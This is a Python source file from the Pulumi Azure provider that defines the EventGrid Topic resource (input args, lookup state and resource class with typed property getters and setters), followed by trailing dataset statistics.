:param pulumi.Input['TopicInputMappingFieldsArgs'] input_mapping_fields: A `input_mapping_fields` block as defined below.
:param pulumi.Input[str] input_schema: Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
:param pulumi.Input[bool] local_auth_enabled: Whether local authentication methods is enabled for the EventGrid Topic. Defaults to `true`.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
:param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if identity is not None:
pulumi.set(__self__, "identity", identity)
if inbound_ip_rules is not None:
pulumi.set(__self__, "inbound_ip_rules", inbound_ip_rules)
if input_mapping_default_values is not None:
pulumi.set(__self__, "input_mapping_default_values", input_mapping_default_values)
if input_mapping_fields is not None:
pulumi.set(__self__, "input_mapping_fields", input_mapping_fields)
if input_schema is not None:
pulumi.set(__self__, "input_schema", input_schema)
if local_auth_enabled is not None:
pulumi.set(__self__, "local_auth_enabled", local_auth_enabled)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if public_network_access_enabled is not None:
pulumi.set(__self__, "public_network_access_enabled", public_network_access_enabled)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
    """
    The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
    """
    # Required input: the only non-Optional property on this args class.
    return pulumi.get(self, "resource_group_name")

@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
    pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def identity(self) -> Optional[pulumi.Input['TopicIdentityArgs']]:
    """
    An `identity` block as defined below.
    """
    return pulumi.get(self, "identity")

@identity.setter
def identity(self, value: Optional[pulumi.Input['TopicIdentityArgs']]):
    pulumi.set(self, "identity", value)
@property
@pulumi.getter(name="inboundIpRules")
def inbound_ip_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TopicInboundIpRuleArgs']]]]:
    """
    One or more `inbound_ip_rule` blocks as defined below.
    """
    return pulumi.get(self, "inbound_ip_rules")

@inbound_ip_rules.setter
def inbound_ip_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TopicInboundIpRuleArgs']]]]):
    pulumi.set(self, "inbound_ip_rules", value)
@property
@pulumi.getter(name="inputMappingDefaultValues")
def input_mapping_default_values(self) -> Optional[pulumi.Input['TopicInputMappingDefaultValuesArgs']]:
    """
    A `input_mapping_default_values` block as defined below.
    """
    return pulumi.get(self, "input_mapping_default_values")

@input_mapping_default_values.setter
def input_mapping_default_values(self, value: Optional[pulumi.Input['TopicInputMappingDefaultValuesArgs']]):
    pulumi.set(self, "input_mapping_default_values", value)
@property
@pulumi.getter(name="inputMappingFields")
def input_mapping_fields(self) -> Optional[pulumi.Input['TopicInputMappingFieldsArgs']]:
    """
    A `input_mapping_fields` block as defined below.
    """
    return pulumi.get(self, "input_mapping_fields")

@input_mapping_fields.setter
def input_mapping_fields(self, value: Optional[pulumi.Input['TopicInputMappingFieldsArgs']]):
    pulumi.set(self, "input_mapping_fields", value)
@property
@pulumi.getter(name="inputSchema")
def input_schema(self) -> Optional[pulumi.Input[str]]:
    """
    Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
    """
    return pulumi.get(self, "input_schema")

@input_schema.setter
def input_schema(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "input_schema", value)
@property
@pulumi.getter(name="localAuthEnabled")
def local_auth_enabled(self) -> Optional[pulumi.Input[bool]]:
    """
    Whether local authentication methods is enabled for the EventGrid Topic. Defaults to `true`.
    """
    return pulumi.get(self, "local_auth_enabled")

@local_auth_enabled.setter
def local_auth_enabled(self, value: Optional[pulumi.Input[bool]]):
    pulumi.set(self, "local_auth_enabled", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
    """
    Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
    """
    return pulumi.get(self, "location")

@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
    """
    Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
    """
    return pulumi.get(self, "name")

@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "name", value)
@property
@pulumi.getter(name="publicNetworkAccessEnabled")
def public_network_access_enabled(self) -> Optional[pulumi.Input[bool]]:
    """
    Whether or not public network access is allowed for this server. Defaults to `true`.
    """
    return pulumi.get(self, "public_network_access_enabled")

@public_network_access_enabled.setter
def public_network_access_enabled(self, value: Optional[pulumi.Input[bool]]):
    pulumi.set(self, "public_network_access_enabled", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
    """
    A mapping of tags to assign to the resource.
    """
    return pulumi.get(self, "tags")

@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
    pulumi.set(self, "tags", value)
@pulumi.input_type
class _TopicState:
    """
    Internal input type holding the full (all-optional) state of a ``Topic``,
    used by ``Topic.get`` to look up and filter existing resources.
    """

    def __init__(__self__, *,
                 endpoint: Optional[pulumi.Input[str]] = None,
                 identity: Optional[pulumi.Input['TopicIdentityArgs']] = None,
                 inbound_ip_rules: Optional[pulumi.Input[Sequence[pulumi.Input['TopicInboundIpRuleArgs']]]] = None,
                 input_mapping_default_values: Optional[pulumi.Input['TopicInputMappingDefaultValuesArgs']] = None,
                 input_mapping_fields: Optional[pulumi.Input['TopicInputMappingFieldsArgs']] = None,
                 input_schema: Optional[pulumi.Input[str]] = None,
                 local_auth_enabled: Optional[pulumi.Input[bool]] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 primary_access_key: Optional[pulumi.Input[str]] = None,
                 public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 secondary_access_key: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
        """
        Input properties used for looking up and filtering Topic resources.
        :param pulumi.Input[str] endpoint: The Endpoint associated with the EventGrid Topic.
        :param pulumi.Input['TopicIdentityArgs'] identity: An `identity` block as defined below.
        :param pulumi.Input[Sequence[pulumi.Input['TopicInboundIpRuleArgs']]] inbound_ip_rules: One or more `inbound_ip_rule` blocks as defined below.
        :param pulumi.Input['TopicInputMappingDefaultValuesArgs'] input_mapping_default_values: A `input_mapping_default_values` block as defined below.
        :param pulumi.Input['TopicInputMappingFieldsArgs'] input_mapping_fields: A `input_mapping_fields` block as defined below.
        :param pulumi.Input[str] input_schema: Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] local_auth_enabled: Whether local authentication methods is enabled for the EventGrid Topic. Defaults to `true`.
        :param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        :param pulumi.Input[str] name: Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
        :param pulumi.Input[str] primary_access_key: The Primary Shared Access Key associated with the EventGrid Topic.
        :param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
        :param pulumi.Input[str] secondary_access_key: The Secondary Shared Access Key associated with the EventGrid Topic.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
        """
        # Only explicitly-provided values are stored; absent (None) properties
        # are left unset so pulumi can distinguish "unset" from "set to None".
        if endpoint is not None:
            pulumi.set(__self__, "endpoint", endpoint)
        if identity is not None:
            pulumi.set(__self__, "identity", identity)
        if inbound_ip_rules is not None:
            pulumi.set(__self__, "inbound_ip_rules", inbound_ip_rules)
        if input_mapping_default_values is not None:
            pulumi.set(__self__, "input_mapping_default_values", input_mapping_default_values)
        if input_mapping_fields is not None:
            pulumi.set(__self__, "input_mapping_fields", input_mapping_fields)
        if input_schema is not None:
            pulumi.set(__self__, "input_schema", input_schema)
        if local_auth_enabled is not None:
            pulumi.set(__self__, "local_auth_enabled", local_auth_enabled)
        if location is not None:
            pulumi.set(__self__, "location", location)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if primary_access_key is not None:
            pulumi.set(__self__, "primary_access_key", primary_access_key)
        if public_network_access_enabled is not None:
            pulumi.set(__self__, "public_network_access_enabled", public_network_access_enabled)
        if resource_group_name is not None:
            pulumi.set(__self__, "resource_group_name", resource_group_name)
        if secondary_access_key is not None:
            pulumi.set(__self__, "secondary_access_key", secondary_access_key)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)

    @property
    @pulumi.getter
    def endpoint(self) -> Optional[pulumi.Input[str]]:
        """
        The Endpoint associated with the EventGrid Topic.
        """
        return pulumi.get(self, "endpoint")

    @endpoint.setter
    def endpoint(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "endpoint", value)

    @property
    @pulumi.getter
    def identity(self) -> Optional[pulumi.Input['TopicIdentityArgs']]:
        """
        An `identity` block as defined below.
        """
        return pulumi.get(self, "identity")

    @identity.setter
    def identity(self, value: Optional[pulumi.Input['TopicIdentityArgs']]):
        pulumi.set(self, "identity", value)

    @property
    @pulumi.getter(name="inboundIpRules")
    def inbound_ip_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TopicInboundIpRuleArgs']]]]:
        """
        One or more `inbound_ip_rule` blocks as defined below.
        """
        return pulumi.get(self, "inbound_ip_rules")

    @inbound_ip_rules.setter
    def inbound_ip_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TopicInboundIpRuleArgs']]]]):
        pulumi.set(self, "inbound_ip_rules", value)

    @property
    @pulumi.getter(name="inputMappingDefaultValues")
    def input_mapping_default_values(self) -> Optional[pulumi.Input['TopicInputMappingDefaultValuesArgs']]:
        """
        A `input_mapping_default_values` block as defined below.
        """
        return pulumi.get(self, "input_mapping_default_values")

    @input_mapping_default_values.setter
    def input_mapping_default_values(self, value: Optional[pulumi.Input['TopicInputMappingDefaultValuesArgs']]):
        pulumi.set(self, "input_mapping_default_values", value)

    @property
    @pulumi.getter(name="inputMappingFields")
    def input_mapping_fields(self) -> Optional[pulumi.Input['TopicInputMappingFieldsArgs']]:
        """
        A `input_mapping_fields` block as defined below.
        """
        return pulumi.get(self, "input_mapping_fields")

    @input_mapping_fields.setter
    def input_mapping_fields(self, value: Optional[pulumi.Input['TopicInputMappingFieldsArgs']]):
        pulumi.set(self, "input_mapping_fields", value)

    @property
    @pulumi.getter(name="inputSchema")
    def input_schema(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "input_schema")

    @input_schema.setter
    def input_schema(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "input_schema", value)

    @property
    @pulumi.getter(name="localAuthEnabled")
    def local_auth_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether local authentication methods is enabled for the EventGrid Topic. Defaults to `true`.
        """
        return pulumi.get(self, "local_auth_enabled")

    @local_auth_enabled.setter
    def local_auth_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "local_auth_enabled", value)

    @property
    @pulumi.getter
    def location(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "location")

    @location.setter
    def location(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "location", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="primaryAccessKey")
    def primary_access_key(self) -> Optional[pulumi.Input[str]]:
        """
        The Primary Shared Access Key associated with the EventGrid Topic.
        """
        return pulumi.get(self, "primary_access_key")

    @primary_access_key.setter
    def primary_access_key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "primary_access_key", value)

    @property
    @pulumi.getter(name="publicNetworkAccessEnabled")
    def public_network_access_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether or not public network access is allowed for this server. Defaults to `true`.
        """
        return pulumi.get(self, "public_network_access_enabled")

    @public_network_access_enabled.setter
    def public_network_access_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "public_network_access_enabled", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter(name="secondaryAccessKey")
    def secondary_access_key(self) -> Optional[pulumi.Input[str]]:
        """
        The Secondary Shared Access Key associated with the EventGrid Topic.
        """
        return pulumi.get(self, "secondary_access_key")

    @secondary_access_key.setter
    def secondary_access_key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "secondary_access_key", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A mapping of tags to assign to the resource.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)
class Topic(pulumi.CustomResource):
    """
    Manages an EventGrid Topic.

    Construction accepts either keyword inputs or a ``TopicArgs`` object (see the
    two ``__init__`` overloads); ``Topic.get`` looks up an existing resource by id.
    """

    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 identity: Optional[pulumi.Input[pulumi.InputType['TopicIdentityArgs']]] = None,
                 inbound_ip_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TopicInboundIpRuleArgs']]]]] = None,
                 input_mapping_default_values: Optional[pulumi.Input[pulumi.InputType['TopicInputMappingDefaultValuesArgs']]] = None,
                 input_mapping_fields: Optional[pulumi.Input[pulumi.InputType['TopicInputMappingFieldsArgs']]] = None,
                 input_schema: Optional[pulumi.Input[str]] = None,
                 local_auth_enabled: Optional[pulumi.Input[bool]] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 __props__=None):
        """
        Manages an EventGrid Topic

        > **Note:** at this time EventGrid Topic's are only available in a limited number of regions.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_azure as azure

        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_topic = azure.eventgrid.Topic("exampleTopic",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            tags={
                "environment": "Production",
            })
        ```

        ## Import

        EventGrid Topic's can be imported using the `resource id`, e.g.

        ```sh
        $ pulumi import azure:eventgrid/topic:Topic topic1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.EventGrid/topics/topic1
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[pulumi.InputType['TopicIdentityArgs']] identity: An `identity` block as defined below.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TopicInboundIpRuleArgs']]]] inbound_ip_rules: One or more `inbound_ip_rule` blocks as defined below.
        :param pulumi.Input[pulumi.InputType['TopicInputMappingDefaultValuesArgs']] input_mapping_default_values: A `input_mapping_default_values` block as defined below.
        :param pulumi.Input[pulumi.InputType['TopicInputMappingFieldsArgs']] input_mapping_fields: A `input_mapping_fields` block as defined below.
        :param pulumi.Input[str] input_schema: Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] local_auth_enabled: Whether local authentication methods is enabled for the EventGrid Topic. Defaults to `true`.
        :param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        :param pulumi.Input[str] name: Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
        """
        ...

    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: TopicArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages an EventGrid Topic

        > **Note:** at this time EventGrid Topic's are only available in a limited number of regions.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_azure as azure

        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_topic = azure.eventgrid.Topic("exampleTopic",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            tags={
                "environment": "Production",
            })
        ```

        ## Import

        EventGrid Topic's can be imported using the `resource id`, e.g.

        ```sh
        $ pulumi import azure:eventgrid/topic:Topic topic1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.EventGrid/topics/topic1
        ```

        :param str resource_name: The name of the resource.
        :param TopicArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatcher for the two overloads above: detect whether the caller
        # passed a TopicArgs object or plain keyword arguments.
        resource_args, opts = _utilities.get_resource_args_opts(TopicArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       identity: Optional[pulumi.Input[pulumi.InputType['TopicIdentityArgs']]] = None,
                       inbound_ip_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TopicInboundIpRuleArgs']]]]] = None,
                       input_mapping_default_values: Optional[pulumi.Input[pulumi.InputType['TopicInputMappingDefaultValuesArgs']]] = None,
                       input_mapping_fields: Optional[pulumi.Input[pulumi.InputType['TopicInputMappingFieldsArgs']]] = None,
                       input_schema: Optional[pulumi.Input[str]] = None,
                       local_auth_enabled: Optional[pulumi.Input[bool]] = None,
                       location: Optional[pulumi.Input[str]] = None,
                       name: Optional[pulumi.Input[str]] = None,
                       public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
                       resource_group_name: Optional[pulumi.Input[str]] = None,
                       tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                       __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: build the full property bag from the inputs.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = TopicArgs.__new__(TopicArgs)
            __props__.__dict__["identity"] = identity
            __props__.__dict__["inbound_ip_rules"] = inbound_ip_rules
            __props__.__dict__["input_mapping_default_values"] = input_mapping_default_values
            __props__.__dict__["input_mapping_fields"] = input_mapping_fields
            __props__.__dict__["input_schema"] = input_schema
            __props__.__dict__["local_auth_enabled"] = local_auth_enabled
            __props__.__dict__["location"] = location
            __props__.__dict__["name"] = name
            __props__.__dict__["public_network_access_enabled"] = public_network_access_enabled
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
            __props__.__dict__["tags"] = tags
            # Output-only properties (not part of TopicArgs' inputs) start unset.
            __props__.__dict__["endpoint"] = None
            __props__.__dict__["primary_access_key"] = None
            __props__.__dict__["secondary_access_key"] = None
        # Alias for the older "azure:eventhub/eventGridTopic:EventGridTopic" type token.
        alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure:eventhub/eventGridTopic:EventGridTopic")])
        opts = pulumi.ResourceOptions.merge(opts, alias_opts)
        super(Topic, __self__).__init__(
            'azure:eventgrid/topic:Topic',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            endpoint: Optional[pulumi.Input[str]] = None,
            identity: Optional[pulumi.Input[pulumi.InputType['TopicIdentityArgs']]] = None,
            inbound_ip_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TopicInboundIpRuleArgs']]]]] = None,
            input_mapping_default_values: Optional[pulumi.Input[pulumi.InputType['TopicInputMappingDefaultValuesArgs']]] = None,
            input_mapping_fields: Optional[pulumi.Input[pulumi.InputType['TopicInputMappingFieldsArgs']]] = None,
            input_schema: Optional[pulumi.Input[str]] = None,
            local_auth_enabled: Optional[pulumi.Input[bool]] = None,
            location: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
            primary_access_key: Optional[pulumi.Input[str]] = None,
            public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
            resource_group_name: Optional[pulumi.Input[str]] = None,
            secondary_access_key: Optional[pulumi.Input[str]] = None,
            tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'Topic':
        """
        Get an existing Topic resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] endpoint: The Endpoint associated with the EventGrid Topic.
        :param pulumi.Input[pulumi.InputType['TopicIdentityArgs']] identity: An `identity` block as defined below.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TopicInboundIpRuleArgs']]]] inbound_ip_rules: One or more `inbound_ip_rule` blocks as defined below.
        :param pulumi.Input[pulumi.InputType['TopicInputMappingDefaultValuesArgs']] input_mapping_default_values: A `input_mapping_default_values` block as defined below.
        :param pulumi.Input[pulumi.InputType['TopicInputMappingFieldsArgs']] input_mapping_fields: A `input_mapping_fields` block as defined below.
        :param pulumi.Input[str] input_schema: Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] local_auth_enabled: Whether local authentication methods is enabled for the EventGrid Topic. Defaults to `true`.
        :param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        :param pulumi.Input[str] name: Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
        :param pulumi.Input[str] primary_access_key: The Primary Shared Access Key associated with the EventGrid Topic.
        :param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
        :param pulumi.Input[str] secondary_access_key: The Secondary Shared Access Key associated with the EventGrid Topic.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _TopicState.__new__(_TopicState)

        __props__.__dict__["endpoint"] = endpoint
        __props__.__dict__["identity"] = identity
        __props__.__dict__["inbound_ip_rules"] = inbound_ip_rules
        __props__.__dict__["input_mapping_default_values"] = input_mapping_default_values
        __props__.__dict__["input_mapping_fields"] = input_mapping_fields
        __props__.__dict__["input_schema"] = input_schema
        __props__.__dict__["local_auth_enabled"] = local_auth_enabled
        __props__.__dict__["location"] = location
        __props__.__dict__["name"] = name
        __props__.__dict__["primary_access_key"] = primary_access_key
        __props__.__dict__["public_network_access_enabled"] = public_network_access_enabled
        __props__.__dict__["resource_group_name"] = resource_group_name
        __props__.__dict__["secondary_access_key"] = secondary_access_key
        __props__.__dict__["tags"] = tags
        return Topic(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter
    def endpoint(self) -> pulumi.Output[str]:
        """
        The Endpoint associated with the EventGrid Topic.
        """
        return pulumi.get(self, "endpoint")

    @property
    @pulumi.getter
    def identity(self) -> pulumi.Output[Optional['outputs.TopicIdentity']]:
        """
        An `identity` block as defined below.
        """
        return pulumi.get(self, "identity")

    @property
    @pulumi.getter(name="inboundIpRules")
    def inbound_ip_rules(self) -> pulumi.Output[Optional[Sequence['outputs.TopicInboundIpRule']]]:
        """
        One or more `inbound_ip_rule` blocks as defined below.
        """
        return pulumi.get(self, "inbound_ip_rules")

    @property
    @pulumi.getter(name="inputMappingDefaultValues")
    def input_mapping_default_values(self) -> pulumi.Output[Optional['outputs.TopicInputMappingDefaultValues']]:
        """
        A `input_mapping_default_values` block as defined below.
        """
        return pulumi.get(self, "input_mapping_default_values")

    @property
    @pulumi.getter(name="inputMappingFields")
    def input_mapping_fields(self) -> pulumi.Output[Optional['outputs.TopicInputMappingFields']]:
        """
        A `input_mapping_fields` block as defined below.
        """
        return pulumi.get(self, "input_mapping_fields")

    @property
    @pulumi.getter(name="inputSchema")
    def input_schema(self) -> pulumi.Output[Optional[str]]:
        """
        Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "input_schema")

    @property
    @pulumi.getter(name="localAuthEnabled")
    def local_auth_enabled(self) -> pulumi.Output[Optional[bool]]:
        """
        Whether local authentication methods is enabled for the EventGrid Topic. Defaults to `true`.
        """
        return pulumi.get(self, "local_auth_enabled")

    @property
    @pulumi.getter
    def location(self) -> pulumi.Output[str]:
        """
        Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "location")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="primaryAccessKey")
    def primary_access_key(self) -> pulumi.Output[str]:
        """
        The Primary Shared Access Key associated with the EventGrid Topic.
        """
        return pulumi.get(self, "primary_access_key")

    @property
    @pulumi.getter(name="publicNetworkAccessEnabled")
    def public_network_access_enabled(self) -> pulumi.Output[Optional[bool]]:
        """
        Whether or not public network access is allowed for this server. Defaults to `true`.
        """
        return pulumi.get(self, "public_network_access_enabled")

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Output[str]:
        """
        The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @property
    @pulumi.getter(name="secondaryAccessKey")
    def secondary_access_key(self) -> pulumi.Output[str]:
        """
        The Secondary Shared Access Key associated with the EventGrid Topic.
        """
        return pulumi.get(self, "secondary_access_key")

    @property
    @pulumi.getter
    def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
        """
        A mapping of tags to assign to the resource.
        """
        return pulumi.get(self, "tags")
| 50.822985
| 294
| 0.684714
| 4,483
| 38,473
| 5.634397
| 0.053759
| 0.083178
| 0.081238
| 0.039194
| 0.922206
| 0.906172
| 0.890455
| 0.880478
| 0.8745
| 0.87066
| 0
| 0.002822
| 0.217061
| 38,473
| 756
| 295
| 50.890212
| 0.835735
| 0.341278
| 0
| 0.791667
| 1
| 0
| 0.149743
| 0.068783
| 0
| 0
| 0
| 0
| 0
| 1
| 0.164352
| false
| 0.002315
| 0.016204
| 0
| 0.280093
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1c99cf2cb472871c625549ab7d8e2c6097697d79
| 1,005
|
py
|
Python
|
chatkit_python_sdk/cursors.py
|
icappello-zg/chatkit-python-sdk
|
1a90924f5b4dd51b7a0166e0f5e95cac5b8577d4
|
[
"MIT"
] | 1
|
2018-10-19T09:02:25.000Z
|
